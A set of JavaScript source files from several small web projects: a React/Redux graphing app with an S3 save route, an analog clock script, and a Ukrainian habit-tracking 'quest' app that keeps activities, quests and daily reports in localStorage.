.randomBytes(8)
.toString('base64')
.replace(/\//g, '7')
const {dataset, columnObj} = req.body
const stringifiedDataset = JSON.stringify({dataset, columnObj})
let datasetParams = {
Bucket: AWS_BUCKET,
Key: awsId,
Body: stringifiedDataset
}
//this creates or updates the desired object
let uploadDatasetPromise = new AWS.S3({apiVersion: '2006-03-01'})
.putObject(datasetParams)
.promise()
uploadDatasetPromise
.then(data => {
res.status(200).send(awsId)
})
.catch(next)
} else {
res.status(401).send('Please log in to save your data')
}
})
<file_sep>import { expect } from 'chai'
import { setData } from './dataset'
import configureMockStore from 'redux-mock-store'
import thunkMiddleware from 'redux-thunk'
const middlewares = [thunkMiddleware]
const mockStore = configureMockStore(middlewares)
describe('dataset thunk creators', () => {
let store
const initialState = {
dataset: [],
columnObj: {},
name: ''
}
beforeEach(() => {
store = mockStore(initialState)
})
afterEach(() => {
store.clearActions()
})
describe('upload data', () => {
it('adds the correct number of rows to dataset', () => {
const fakeData = [
{Owner: 'Nancy', Cats: 5, Dogs: 3, Hamsters: 2},
{Owner: 'Raplph', Cats: 1, Dogs: 2, Hamsters: 1}
];
const fakeFileName = 'Animal Count';
const fakeColumnObj = {
Owner: 'text', Cats: 'number', Dogs: 'number', Hamsters: 'number'
}
const fakeDataset = {
dataset: fakeData, columnObj: fakeColumnObj, name: fakeFileName
}
store.dispatch(setData(fakeDataset))
const actions = store.getActions();
expect(actions[0].type).to.be.equal('SET_DATA');
expect(actions[0].data.dataset).to.be.deep.equal(fakeData);
})
})
})<file_sep>import React from 'react'
import PropTypes from 'prop-types'
import {connect} from 'react-redux'
import {Link} from 'react-router-dom'
import {logout} from '../store'
// Top navigation bar. Shows login/signup links for guests and a greeting,
// profile link, and logout action for authenticated users.
const Navbar = ({handleClick, isLoggedIn, email}) => {
// Display name: the capitalized local part of the email (before the '@').
const name = email
? `${email[0].toUpperCase()}${email.slice(1, email.search('@'))}`
: ''
return (
<div id="navbar">
<div>
<Link id="navbar-home" to="/">
<img id="navbar-home-img" src="/graph-icon.png" />
<h1 id="navbar-home-name">GRAPHIFY</h1>
</Link>
</div>
<nav id="navbar-options">
{isLoggedIn ? (
<div>
{/* The navbar will show these links after you log in */}
<div className="navbar-options-name">
<h3>Hi, {name}!</h3>
</div>
<Link className="navbar-options-buttons" to="/profile">
My Account
</Link>
<a
className="navbar-options-buttons"
href="/"
onClick={handleClick}
>
Logout
</a>
</div>
) : (
<div>
{/* The navbar will show these links before you log in */}
<Link className="navbar-options-buttons" to="/login">
Login
</Link>
<Link className="navbar-options-buttons" to="/signup">
Sign Up
</Link>
</div>
)}
</nav>
</div>
)
}
/**
* CONTAINER
*/
const mapState = state => {
return {
email: state.user.email,
isLoggedIn: !!state.user.id
}
}
const mapDispatch = dispatch => {
return {
handleClick() {
dispatch(logout())
}
}
}
export default connect(mapState, mapDispatch)(Navbar)
/**
* PROP TYPES
*/
Navbar.propTypes = {
handleClick: PropTypes.func.isRequired,
isLoggedIn: PropTypes.bool.isRequired
}
<file_sep>import React, { Component } from 'react'
import { connect } from 'react-redux'
import {
LineChartGraph,
BarChartGraph,
AreaChartGraph,
RadarChartGraph,
ScatterChartGraph,
PieChartGraph
} from './graphs'
import ReactTable from 'react-table'
import { setXAxis, addYAxis, deleteYAxis } from '../store'
import axios from 'axios'
import { toast } from 'react-toastify'
import { NotLoggedInErrorPopup } from '../componentUtils'
import htmlToImage from 'html-to-image'
class GraphDataset extends Component {
constructor(props) {
super(props)
this.state = {
yCategQuantity: ['']
}
this.addYCategory = this.addYCategory.bind(this)
this.handleDeleteY = this.handleDeleteY.bind(this)
this.handleGraphClick = this.handleGraphClick.bind(this)
}
addYCategory() {
this.setState({
yCategQuantity: [...this.state.yCategQuantity, '']
})
}
handleDeleteY(idx) {
const { deleteY } = this.props
deleteY(idx)
this.setState({
yCategQuantity: this.state.yCategQuantity.slice(0, -1)
})
}
handleGraphClick(graphType) {
const { dataset, graphSettings } = this.props
const { currentX, currentY } = graphSettings
const datasetName = dataset.name
//upload to AWS only if the dataset doesn't already have an awsId
let AWSPost = !dataset.awsId
? axios.post(`api/graphs/aws`, { dataset })
: (AWSPost = Promise.resolve({ data: dataset.awsId }))
AWSPost.then(res => {
if (res.status === 401) {
}
return axios.post(`api/graphs`, {
xAxis: currentX,
yAxis: currentY,
title: datasetName,
datasetName,
graphType,
awsId: res.data
})
})
.then(res => {
let chartSVG = document.getElementById(`${graphType}-graph`).children[0];
const { graphId } = this.props.match.params
return htmlToImage.toJpeg(chartSVG, { backgroundColor: '#FFFFFF', height: 700, width: 700, style: { margin: 'auto', verticalAlign: 'center' } })
.then((dataUrl) => {
return axios.post(`/api/aws/graph/${res.data}`, {
svgBlob: dataUrl
})
})
})
.then(res => {
this.props.history.push(`/graph-dataset/customize/${res.data}`)
toast('Graph Saved', {
autoClose: 3000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
if (!dataset.awsId) {
toast('Dataset Saved', {
autoClose: 3000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
}
})
.catch(err => {
console.error(err);
const errorButton = document.getElementById("error-button");
errorButton.click();
})
}
render() {
const {
dataset,
graphSettings,
handleXCategory,
handleYCategory
} = this.props
const { currentX, currentY } = graphSettings
const columnObj = dataset.dataset.length > 0 ? dataset.columnObj : {}
const xAxis = Object.keys(columnObj)
const yAxis = xAxis.filter(key => {
return (
columnObj[key].toLowerCase() === 'number' ||
columnObj[key].toLowerCase() === 'percent'
)
})
const columns = xAxis.map(column => {
return {
Header: column,
accessor: column,
width: 'auto'
}
})
const displayScatter =
currentY.length > 0 && currentX && yAxis.includes(currentX)
const displayGroup = currentY.length > 0 && currentX
const displayRadar =
currentY.length > 0 && currentX && !yAxis.includes(currentX)
const displayPie =
currentY.length === 0 && currentX && !yAxis.includes(currentX)
const recommendation = displayScatter
? 'A Scatter Chart may be best for this data'
: displayPie
? 'A Pie Chart may be best for this data'
: displayGroup ? 'A Bar Chart may be best for this data' : null
return (
<div id="graph-dataset">
{NotLoggedInErrorPopup(<button id="error-button" style={{ display: "none" }}></button>, this.props.location.pathname)}
<div id="graph-dataset-table-container">
<h1 id="graph-dataset-table-container-name">{dataset.name}</h1>
{!!dataset.dataset.length &&
xAxis.length && (
<div id="graph-dataset-table-container-table">
<ReactTable
data={dataset.dataset}
columns={columns}
defaultPageSize={5}
/>
</div>
)}
</div>
<div id="graph-dataset-select">
<h1 id="graph-dataset-select-name">Select which data to graph</h1>
{!!dataset.dataset.length && (
<div>
<div className="graph-dataset-headers">
<div id="graph-dataset-select-x-y">
<div>
<h3>X Axis Data</h3>
<select
className="graph-dataset-select-x-y-input"
onChange={handleXCategory}
>
<option hidden>choose X</option>
{xAxis.map(xCategory => (
<option key={xCategory}>{xCategory}</option>
))}
</select>
</div>
<div>
<div className="graph-dataset-select-y">
<h3>Y Axis Data</h3>
<button
id="graph-dataset-select-y-add"
onClick={this.addYCategory}
>
+
</button>
</div>
{this.state.yCategQuantity.map((n, idx) => {
return (
<div className="graph-dataset-select-y" key={idx}>
<select
className="graph-dataset-select-x-y-input"
onChange={e => handleYCategory(e.target.value, idx)}
>
<option hidden>choose Y</option>
{yAxis.map(yCategory => (
<option key={yCategory}>{yCategory}</option>
))}
</select>
<button
id="graph-dataset-select-y-delete"
onClick={() => this.handleDeleteY(idx)}
>
x
</button>
</div>
)
})}
</div>
</div>
<div id="graph-dataset-message">
<div id="click-message">
<h2>Choose Your Favorite Graph</h2>
<p>
<strong>Recommendation: </strong>
{recommendation}
</p>
<p>
Upon click your <strong>Dataset</strong> is going to be
saved automaticly
</p>
<p>
Upon click your <strong>Graph</strong> is going to be
saved automaticly
</p>
</div>
</div>
</div>
<div className="graph-dataset-graphs">
<div
id="Scatter-graph"
onClick={() => this.handleGraphClick('Scatter')}
className="graph-dataset-single-container"
style={{ display: displayScatter ? 'inline' : 'none' }}
>
<ScatterChartGraph />
</div>
<div
id="Line-graph"
onClick={() => this.handleGraphClick('Line')}
className="graph-dataset-single-container"
style={{ display: displayGroup ? 'inline' : 'none' }}
>
<LineChartGraph />
</div>
<div
id="Bar-graph"
onClick={() => this.handleGraphClick('Bar')}
className="graph-dataset-single-container"
style={{ display: displayGroup ? 'inline' : 'none' }}
>
<BarChartGraph />
</div>
<div
id="Radar-graph"
onClick={() => this.handleGraphClick('Radar')}
className="graph-dataset-single-container"
style={{ display: displayRadar ? 'inline' : 'none' }}
>
<RadarChartGraph />
</div>
<div
id="Area-graph"
onClick={() => this.handleGraphClick('Area')}
className="graph-dataset-single-container"
style={{ display: displayGroup ? 'inline' : 'none' }}
>
<AreaChartGraph />
</div>
<div
id="Pie-graph"
onClick={() => this.handleGraphClick('Pie')}
className="graph-dataset-single-container"
style={{ display: displayPie ? 'inline' : 'none' }}
>
<PieChartGraph />
</div>
</div>
</div>
)}
</div>
</div>
)
}
}
// Redux container: expose the dataset, the current graph settings and the
// user, and wrap the axis action creators in dispatch.
const mapState = state => {
  return {
    dataset: state.dataset,
    graphSettings: state.graphSettings,
    user: state.user
  }
}

const mapDispatch = dispatch => ({
  handleXCategory: event => {
    dispatch(setXAxis(event.target.value))
  },
  handleYCategory(yAxis, idx) {
    dispatch(addYAxis(yAxis, idx))
  },
  deleteY(idx) {
    dispatch(deleteYAxis(idx))
  }
})

export default connect(mapState, mapDispatch)(GraphDataset)
<file_sep>const User = require('./user')
const Graph = require('./graph')
const YAxis = require('./yAxis')
const Dataset = require('./dataset')

// Sequelize associations:
//   User 1-* Graph, User 1-* Dataset, Dataset 1-* Graph, Graph 1-* YAxis.
User.hasMany(Graph);
Graph.belongsTo(User);
User.hasMany(Dataset);
Dataset.belongsTo(User);
Dataset.hasMany(Graph);
Graph.belongsTo(Dataset);
Graph.hasMany(YAxis);
YAxis.belongsTo(Graph);

// Re-export all models from a single entry point.
module.exports = {
  User,
  Graph,
  YAxis,
  Dataset
}
<file_sep>
// Coerce every column marked 'number' in columnObj to actual Number values
// (mutates the row objects in place), then return the dataset capped at 30
// rows together with its column-type map.
export function datasetColumnFormatter(dataset, columnObj) {
  // Only columns typed as numbers need coercion.
  const numberColumns = Object.keys(columnObj).filter(key => {
    return columnObj[key].toLowerCase() === 'number';
  });
  for (const row of dataset) {
    for (const key of numberColumns) {
      row[key] = Number(row[key]);
    }
  }
  // NOTE: the previous version also built a truncated copy here that was
  // never used; filteringSizeDataset already applies the 30-row cap.
  return {dataset: filteringSizeDataset(dataset), columnObj}
}
//change uploaded data from array of arrays into an array of objects
// Convert an uploaded array-of-arrays (first row = column headers) into an
// array of row objects, inferring each column's type ('number' vs 'text')
// from the first data row, then hand off to datasetColumnFormatter.
export function uploadedDataFormatter(dataset) {
  const [headers, firstRow] = dataset;
  const columnObj = {};
  firstRow.forEach((cell, i) => {
    columnObj[headers[i]] = isNaN(+cell) ? 'text' : 'number';
  });
  const rows = dataset.slice(1).map(cells => {
    const row = {};
    cells.forEach((cell, i) => {
      row[headers[i]] = cell;
    });
    return row;
  });
  return datasetColumnFormatter(rows, columnObj);
}
// Cap the dataset at 30 rows. Always returns a shallow copy, never mutating
// the caller's array (same contract as the original spread+splice version).
export function filteringSizeDataset(dataset) {
  const maxRows = 30;
  return dataset.slice(0, maxRows);
}
| 2bff74928d88dd168025c9bcf5e5470365bda84a | [
"JavaScript",
"Markdown"
] | 21 | JavaScript | Graphitti/graphify | c1667cc65a2c7f6efb6391683dddec8ba86d0b98 | 34bd0ea91189d4a1de750e07d4f9756d4798d68c |
refs/heads/master | <file_sep>
// Cache the three clock-hand elements once at load time.
const segundero = document.querySelector('.segundos');
const minutero = document.querySelector('.minutos');
const horero = document.querySelector('.hora');

// Rotate each hand to match the current wall-clock time. The +90deg offset
// compensates for the hands' CSS starting orientation.
function setDate () {
  const now = new Date();
  const rotateHand = (hand, fraction) => {
    hand.style.transform = `rotate(${(fraction * 360) + 90}deg)`;
  };
  rotateHand(segundero, now.getSeconds() / 60);
  rotateHand(minutero, now.getMinutes() / 60);
  rotateHand(horero, now.getHours() / 24);
}
setInterval(setDate, 1000); | ee7543be659b83d7b13d94428aef428cad4f0b3d | [
"JavaScript"
] | 1 | JavaScript | tomas-ezama/JS30 | 3f4ea3632a784d73cbc14e5f9eec818fcb744c81 | dabdc460615f3c5abb0d69e2ca7cd1a9f390af9d |
refs/heads/master | <file_sep>questInfoModal.firstElementChild.onclick = () => {
showActivityInfoModal(questInfoModal.firstElementChild.dataset.id)
questInfoGlass.hidden = true
}
// Clicking a ✔️/❌ button inside the quest-details list reports that day's
// todo as done/failed, refreshes every dependent view and re-renders the
// modal; on quest completion, scroll the last list item into view.
questInfoModal.querySelector('ul').onclick = event => {
  if (event.target.tagName == 'BUTTON') {
    // ✔️ marks the day as done; the other button (❌) marks it failed.
    const status = event.target.innerText == '✔️'? 'done' : 'failed'
    const todoID = event.target.closest('li').dataset.id
    const {questID} = todos.find(todo => todo.id == todoID)
    const quest = quests.find(quest => quest.id == questID)
    setTodoStatus(todoID, status)
    showConfidence()
    showActivities()
    showQuests()
    prepQuestInfoModal(quest)
    if (quest.status == 'done')
      event.currentTarget.lastElementChild.scrollIntoView({behavior:'smooth'})
  }
}
// Fill the "details" modal with the quest's and its activity's values.
// NOTE(review): relies on the modal markup exposing exactly 10 <div><span>
// slots in this fixed order — keep in sync with the HTML.
function prepQuestInfoModal(quest) {
  const activity = activities.find(activity => activity.id == quest.activityID)
  questInfoModal.firstElementChild.dataset.id = activity.id
  const spans = questInfoModal.querySelectorAll('div>span')
  spans[0].innerText = activity.name
  spans[1].innerText = activity.size
  // Per-day reward = total quest reward divided by its length in days.
  spans[2].innerText = quest.confidence/quest.total
  spans[3].innerText = isoToGOST(quest.from)
  spans[4].innerText = isoToGOST(quest.to)
  spans[5].innerText = quest.progress
  spans[6].innerText = quest.total
  spans[7].innerText = quest.confidence
  spans[8].innerText = quest.status == 'done' ? '✔️' : quest.status == 'failed' ? '❌' : ''
  spans[9].innerText = statusUKR[quest.status]
  showQuestTodos(quest)
}
// Open the quest-details modal for the quest with the given id.
function showQuestInfoModal(questID) {
  const quest = quests.find(quest => quest.id == questID)
  prepQuestInfoModal(quest)
  questInfoGlass.hidden = false
}
// Build one per-day report item for the quest-details list. The ✔️/❌
// buttons are shown only for the first actionable day: all previous days
// done, and the day's date not in the future.
function buildQuestTodoItem(todo, i, todos) {
  return `
    <li class="${todo.status}" data-id="${todo.id}">
      <span>
        ${todo.status == 'done' ? '✔️'
      : (todo.status == 'failed' ? '❌'
        : i && todos[i-1].status != 'done' || todo.date > dateToISO(new Date) ? ''
          : '<span><button>✔️</button><button>❌</button></span>')}
      </span>
      <span>${isoToWeekDay(todo.date)}</span>
      <span>+${todo.confidence}</span>
    </li>
  `
}
// Render every per-day report belonging to the quest into the modal's list.
function showQuestTodos(quest) {
  const questTodos = todos.filter(todo => todo.questID == quest.id)
  questInfoModal.querySelector('ul').innerHTML = questTodos.map(buildQuestTodoItem).join('')
}
<file_sep>let overdueTodos = []
// Overdue todos grouped by ISO date: { 'YYYY-MM-DD': [todo, ...] }.
let groupedOverdueTodos = {}

// Close the reports modal on backdrop or close-button click.
reportGlass.onclick = event => {
  if (event.target == reportGlass || event.target.classList.contains('close'))
    reportGlass.hidden = true
}

// "Reports" button: (re)collect overdue todos, render them and open the
// modal. The list's click handler is (re)bound on every open.
reportBtn.onclick = () => {
  selectOverdueTodos()
  showOverdueTodos()
  if (!overdueTodos.length) {
    overdueTodoList.innerHTML = '<center>Відмінно! Прострочених звітів немає</center>'
  }
  showReportModal()
  // Clicking ✔️/❌ on an overdue item reports it and refreshes the views.
  overdueTodoList.onclick = event => {
    if (event.target.tagName == 'BUTTON') {
      const status = event.target.innerText == '✔️'? 'done' : 'failed'
      setTodoStatus(event.target.closest('li').dataset.id, status)
      showConfidence()
      showOverdueTodos()
      showQuests()
      showActivities()
    }
  }
}

// Show the modal with the list of overdue reports.
function showReportModal() {
  reportGlass.hidden = false
}
// Collect all todos still 'planned' whose date is before today (missed
// reports), sort them oldest-first, and rebuild groupedOverdueTodos.
function selectOverdueTodos() {
  const today = dateToISO(new Date)
  overdueTodos = todos.filter(todo => todo.status == 'planned' && todo.date < today)
  // Bug fix: the previous comparator only ever returned -1 (the `return 1`
  // branch was commented out "for experiment"), which is an inconsistent
  // comparator and can leave the list in engine-dependent order. ISO dates
  // compare correctly as strings, so a full three-way comparison is safe.
  overdueTodos.sort((a, b) => a.date < b.date ? -1 : a.date > b.date ? 1 : 0)
  groupedOverdueTodos = {}
  const dates = [...new Set(overdueTodos.map(todo => todo.date))]
  for (const date of dates) {
    groupedOverdueTodos[date] = overdueTodos.filter(todo => todo.date == date)
  }
}
// Build one overdue-report list item. Action buttons appear only on the
// FIRST still-planned todo of its quest (days must be reported in order).
function buildOverdueTodoItem(todo) {
  const quest = quests.find(quest => quest.id == todo.questID)
  const activity = activities.find(activity => activity.id == quest.activityID)
  // True when this todo is the earliest 'planned' one of its quest.
  const first = overdueTodos.find(otherTodo => otherTodo.questID == todo.questID &&
    otherTodo.status == 'planned') == todo
  return `
    <li class="${todo.status}" data-id="${todo.id}">
      ${todo.status == 'done' ? '<span>✔️</span>'
      : todo.status == 'failed' ? '<span>❌</span>'
        : first ? '<span><button>✔️</button><button>❌</button></span>' : ''}
      ${todo.status == 'planned' ? '' : '<div></div>'}
      <span>${activity.name}</span>
      <span>${activity.size}</span>
      <span>+${todo.confidence}</span>
    </li>
  `
}
// Render the overdue reports: one section per date (GOST-formatted heading)
// with the per-todo markup underneath.
function showOverdueTodos() {
  const overdueTodoList = document.getElementById('overdueTodoList')
  let html = ''
  for (const date in groupedOverdueTodos) {
    // Guard against inherited keys when iterating with for...in.
    if (!groupedOverdueTodos.hasOwnProperty(date)) continue
    const todos = groupedOverdueTodos[date]
    html += `
    <li>
      <h3>${isoToGOST(date)}</h3>
      <ul class="todos">
        ${todos.map(todo => buildOverdueTodoItem(todo, overdueTodos)).join('')}
      </ul>
    </li>
    `
  }
  overdueTodoList.innerHTML = html
}
if (event.target == activityInfoGlass || event.target.classList.contains('close'))
activityInfoGlass.hidden = true
else if (event.target.classList.contains('save')) {
if (updateActivity(activityInfoModal.querySelector('.save').dataset.id)) {
showActivities()
showQuests()
activityInfoGlass.hidden = true
}
}
}
// Clicking any quest row inside the activity-details modal opens that
// quest's own details modal.
activityInfoModal.querySelector('ul').onclick = event => {
  const questItem = event.target.closest('li')
  if (questItem) showQuestInfoModal(questItem.dataset.id)
}
// Fill the activity-details modal: the three editable inputs (name, size,
// difficulty — in that fixed order) and the list of the activity's quests.
function prepActivityInfoModal(activity) {
  const inputs = activityInfoModal.querySelectorAll('input')
  inputs[0].value = activity.name
  inputs[1].value = activity.size
  inputs[2].value = activity.diff
  const activityQuests = quests.filter(quest => quest.activityID == activity.id)
  activityInfoModal.querySelector('ul').innerHTML =
    activityQuests.map(buildActivityQuest).join('')
  // Remember which activity the Save button refers to.
  activityInfoModal.querySelector('.save').dataset.id = activity.id
}
// Open the activity-details modal for the activity with the given id.
function showActivityInfoModal(activityID) {
  const activity = activities.find(activity => activity.id == activityID)
  prepActivityInfoModal(activity)
  activityInfoGlass.hidden = false
}
// Build one quest summary row for the activity-details modal.
function buildActivityQuest(quest) {
  return `
    <li data-id="${quest.id}">
      <details>
        <summary>
          <span title="дата початку">з ${isoToGOST(quest.from)}</span>
          <span title="можлива дата завершення">по ${isoToGOST(quest.to)}</span>
          <span><span title="кількість днів виконання позаду">${quest.progress}/</span>
          <span title="передбачена тривалість квесту">${quest.total} днів</span></span>
          <span title="завдаток/винагорода по завершенню">${quest.confidence}</span>
          <span title="статус квесту">${statusUKR[quest.status]}</span>
        </summary>
      </details>
    </li>
  `
}
// Validate the activity-details inputs and persist any edits. Returns true
// when the modal may close (no change, or a successful save), false when
// validation failed. (Removed the commented-out alert/iteration experiments
// that were left in the previous version.)
function updateActivity(activityID) {
  const inputs = activityInfoModal.querySelectorAll('input')
  const activity = activities.find(activity => activity.id == activityID)
  // Nothing changed — treat as a successful no-op save.
  if (inputs[0].value == activity.name &&
    inputs[1].value == activity.size &&
    inputs[2].value == activity.diff) return true
  if ([inputs[0].value, inputs[1].value, inputs[2].value].includes('')) {
    showAlert('Заповніть пусті поля')
    return false
  }
  activity.name = inputs[0].value
  activity.size = inputs[1].value
  // Difficulty is clamped to the 1..10 scale.
  const diff = Math.min(Math.max(1, +inputs[2].value), 10)
  activity.diff = diff
  localStorage.activities = JSON.stringify(activities)
  return true
}
<file_sep>// вхідні дані, збережені в локалсторедж
// масив обєктів для зберігання видів діяльності
// масив обєктів для зберігання квестів
// плани на виконання квесту
// пов'язуємо всі дані між собою
if (location.hostname !== '127.0.0.1') { // hosted (GitHub Pages): start with empty data
  if (!localStorage.nextID ||
    !localStorage.confidence ||
    !localStorage.activities ||
    !localStorage.quests ||
    !localStorage.todos) {
    localStorage.nextID = '12'
    localStorage.confidence = ''
    localStorage.activities = JSON.stringify([])
    localStorage.quests = JSON.stringify([])
    localStorage.todos = JSON.stringify([])
  }
} else { // local development: seed demo activities, one quest and its todos
  if (!localStorage.nextID ||
    !localStorage.confidence ||
    !localStorage.activities ||
    !localStorage.quests ||
    !localStorage.todos) {
    localStorage.nextID = '12'
    localStorage.confidence = '50'
    localStorage.activities = JSON.stringify([
      {id: 1, name: 'Програмування', size: '2 години', diff: 2},
      {id: 2, name: 'Англійська', size: '2 години', diff: 5},
      {id: 3, name: 'Фізкультура', size: '1 година', diff: 9},
    ])
    localStorage.quests = JSON.stringify([
      {id: 4, activityID: 1, from: '2020-10-04', to: '2020-10-10',
        progress: 4, total: 7, confidence: 14, status: 'ongoing'},
    ])
    localStorage.todos = JSON.stringify([
      {id: 5, questID: 4, date: '2020-10-04', confidence: 1, status: 'done', n: 1},
      {id: 6, questID: 4, date: '2020-10-05', confidence: 1, status: 'done', n: 2},
      {id: 7, questID: 4, date: '2020-10-06', confidence: 1, status: 'done', n: 3},
      {id: 8, questID: 4, date: '2020-10-07', confidence: 2, status: 'done', n: 4},
      {id: 9, questID: 4, date: '2020-10-08', confidence: 2, status: 'planned', n: 5},
      {id: 10, questID: 4, date: '2020-10-09', confidence: 2, status: 'planned', n: 6},
      {id: 11, questID: 4, date: '2020-10-10', confidence: 2, status: 'planned', n: 7},
    ])
  }
}
// First run: ask the user to rate their self-confidence (1..10); `etap`
// doubles as the "already initialized" flag and the base quest length.
if (!localStorage.etap) {
  showPrompt('Оцініть віру в себе за десятибальною шкалою: ', 'number', (answer) => {
    if (+answer < 2) {
      showAlert('Вибачте, ми не можемо взяти на себе відповідальність. З такою низькою вірою в себе зверністься до психолога')
      return false
    }
    if (+answer > 10) answer = 10
    localStorage.confidence = answer
    localStorage.etap = answer
    showConfidence()
    return true
  })
}
// In-memory working copies of the persisted collections.
let activities = JSON.parse(localStorage.activities)
// quests reference activities by activityID
let quests = JSON.parse(localStorage.quests)
// per-day execution plans; each todo references its quest by questID
let todos = JSON.parse(localStorage.todos)<file_sep>
// закриваэмо модальне вікно для планів квесту
todoGlass.onclick = event => {
if (event.target == todoGlass || event.target.innerText == 'Ok') {
todoGlass.hidden = true
}
}
// клік
showTodoBtn.onclick = () => {
showTodoToday()
if (!todoList.children.length) {
todoList.innerHTML = '<center>Планів на сьогодні немає. Варто взяти квест</center>'
}
showTodoModal()
}
//клік на кнопку ок чи фолс
todoList.onclick = event => {
if (event.target.tagName == 'BUTTON') {
const status = event.target.innerText == '✔️'? 'done' : 'failed'
setTodoStatus(event.target.closest('li').dataset.id, status)
showConfidence()
showTodoToday()
showQuests()
showActivities()
}
}
// функція для показу модального вікна з планами на сьогодні
function showTodoModal() {
todoGlass.hidden = false
}
// функція для побудови елементу списку планів
function buildTodoItem(todo) {
const quest = quests.find(quest => quest.id == todo.questID)
const activity = activities.find(activity => activity.id == quest.activityID)
return `
<li class="${todo.status}" data-id="${todo.id}">
${todo.status == 'done' ? '<span>✔️</span>'
: (todo.status == 'failed' ? '<span>❌</span>'
: '<span><button>✔️</button><button>❌</button></span>')}
${todo.status == 'planned' ? '' : '<div></div>'}
<span>${activity.name}</span>
<span>${activity.size}</span>
<span>+${todo.confidence}</span>
</li>
`
}
// функція для виводу планів на сьогодні
function showTodoToday() {
todoList.innerHTML = todos.filter(todo => {
const date = new Date
if (todo.date != dateToISO(date)) return
else if (todo.status !== 'failed') return true
const quest = quests.find(quest => quest.id == todo.questID)
//const yesterday = new Date(date - 86400000)
date.setDate(date.getDate() - 1)
const alreadyFailed = todos.find(todo => todo.questID == quest.id
&& todo.date == (dateToISO(date)) && todo.status == 'failed')
return !alreadyFailed
})
.map(buildTodoItem).join('')
}
// функція для зміни статусу плану і кількості очок
function setTodoStatus(todoID, status) {
const todo = todos.find(todo => todo.id == todoID)
todo.status = status
const quest = quests.find(quest => quest.id == todo.questID)
if (status == 'done') {
quest.progress++
confidence(todo.confidence)
updateQuestStatus(quest)
populateQuestTodos(quest)
} else {
const canceledTodos = todos.filter(todo => todo.questID == quest.id && todo.status == 'planned')
canceledTodos.forEach(todo => todo.status = 'failed')
if (quest.status != 'ongoing') todos = todos.filter(todo => !canceledTodos.includes(todo))
updateQuestStatus(quest)
}
localStorage.todos = JSON.stringify(todos)
}
//функція для зміни статусу квесту в залежності від плану
function updateQuestStatus(quest /* or quest.id */) {
//якщо передали не обэкт квесту то тоді це його айді
if (typeof quest != 'object') quest = quests.find(q => q.id == quest)
if (quest.status != 'ongoing' ) return quest.status
if (quest.progress >= quest.total) {
confidence(quest.confidence)
quest.status = 'done'
const activity = activities.find(activity => activity.id == quest.activityID)
if (quest.total >= +localStorage.etap &&
activity.diff >= quest.confidence/quest.total &&
activity.diff > 1) {
activity.diff--
localStorage.activities = JSON.stringify(activities)
}
}
else if (todos.some(todo => todo.questID == quest.id && todo.status == 'failed')) {
quest.status = 'failed'
const activity = activities.find(activity => activity.id == quest.activityID)
if (activity.diff <= quest.confidence/quest.total) {
activity.diff++
localStorage.activities = JSON.stringify(activities)
}
}
localStorage.quests = JSON.stringify(quests)
return quest.status
}
//функція для створення нових todo для quest
function populateQuestTodos(quest) {
const questTodos = todos.filter(todo => todo.questID == quest.id)
if (!quest.progress && !questTodos.length) {
addNewTodos(quest)
} else if (quest.status == 'done' && questTodos.every(todo => todo.status == 'done')) {
continueInertia(questTodos)
}
}
function addNewTodos(quest) {
const diff = quest.confidence/quest.total
const date = new Date(quest.from)
date.setDate(date.getDate() - 1)
const yesterdayTodos = todos.filter(todo => todo.date == dateToISO(date) && todo.status == 'done')
const lastTodo = yesterdayTodos.find(todo => {
const q = quests.find(quest => quest.id == todo.questID)
return quest.activityID == q.activityID
})
const n = lastTodo?.n || 0
for (let i = 0; i < quest.total; i++) {
const date = new Date(quest.from)
if (!i) {
const activityQuestsIDs = quests.filter(q => q.activityID == quest.activityID)
.map(quest => quest.id)
const inertiaTodo = todos.findIndex(todo => todo.date == dateToISO(date) &&
activityQuestsIDs.includes(todo.questID) && todo.status == 'planned')
if (inertiaTodo !== -1)
todos.splice(inertiaTodo, 1)
}
date.setDate(date.getDate() + i)
const newTodo = {
id: newID(),
questID: quest.id,
date: dateToISO(date),
confidence: Math.min(diff, Math.floor((i + n + 1) ** 0.5)),
status: 'planned',
n: i + n + 1,
}
todos.push(newTodo)
}
localStorage.todos = JSON.stringify(todos)
}
function continueInertia(questTodos) {
const lastTodo = questTodos[questTodos.length - 1]
const date = new Date(lastTodo.date)
date.setDate(date.getDate() + 1)
const newTodo = { ...lastTodo, id: newID(), date: dateToISO(date), status: 'planned' }
todos.push(newTodo)
if (newTodo.date < dateToISO(new Date)) {
overdueTodos.push(newTodo)
overdueTodos.sort((a, b) => a.date < b.date ? -1 : 1)
groupedOverdueTodos[newTodo.date] =
[...groupedOverdueTodos[newTodo.date] || [], newTodo]
}
localStorage.todos = JSON.stringify(todos)
}
<file_sep>
Date.customTimeline = function ({
current = new Date('Oct 21 2015 04:29 pm'), // 'Back to the Future' Day
updInterval = 77,
speed = 1,
running = true
} = {}) {
current = +current
let stickMoment, stickPoint
let updTimer = 0
let updCount = 0
// reset the point to measure the time from it
const stickNow = () => {
stickMoment = Date.now()
stickPoint = current
}
const update = () => {
const now = Date.now()
current = stickPoint + (now - stickMoment) * speed
timeline.dispatchEvent( new CustomEvent('update', {detail: timeline.now}) )
return ++updCount
}
const shift = (diff) => {
if (typeof diff != 'number') return false
current += diff
stickNow()
if (running) run()
else update()
return current
}
const run = () => {
if (!running) stickNow()
update()
clearInterval(updTimer)
updTimer = setInterval(update, updInterval)
timeline.dispatchEvent( new Event('run') )
running = true
}
const freeze = () => {
if (running) {
update()
clearInterval(updTimer)
stickNow()
running = false
timeline.dispatchEvent( new Event('freeze') )
}
}
const timeline = new EventTarget
Object.assign(timeline, {update, shift, run, freeze})
Object.defineProperties(timeline, {
now: {
get: () => new Date(current),
set(date) {
current = +date
stickNow()
if (running) run()
else update()
return date
}
},
updInterval: {
get: () => updInterval,
set(interval) {
clearInterval(updTimer)
updInterval = interval
if (running) run()
return interval
}
},
speed: {
get: () => speed,
set(multiplier) {
clearInterval(updTimer)
speed = multiplier
stickNow()
if (running) run()
return multiplier
}
},
updCount: {
get: () => updCount,
set: count => updCount = count
},
running: {
get: () => running
}
})
stickNow()
if (running) run()
return timeline
}
// Replace the global Date so the whole app runs on the simulated timeline:
// zero-argument Date() / new Date yields the virtual "now"; any arguments
// still construct a real Date.
// NOTE(review): `tl` and `DateOriginal` are implicit globals — consider
// declaring them explicitly; confirm no other script depends on window.tl.
tl = Date.customTimeline({current: new Date(2020,9,19)})
DateOriginal = Date
Date = function Date(...args) {
  return args.length ? new DateOriginal(...args) : tl.now
}
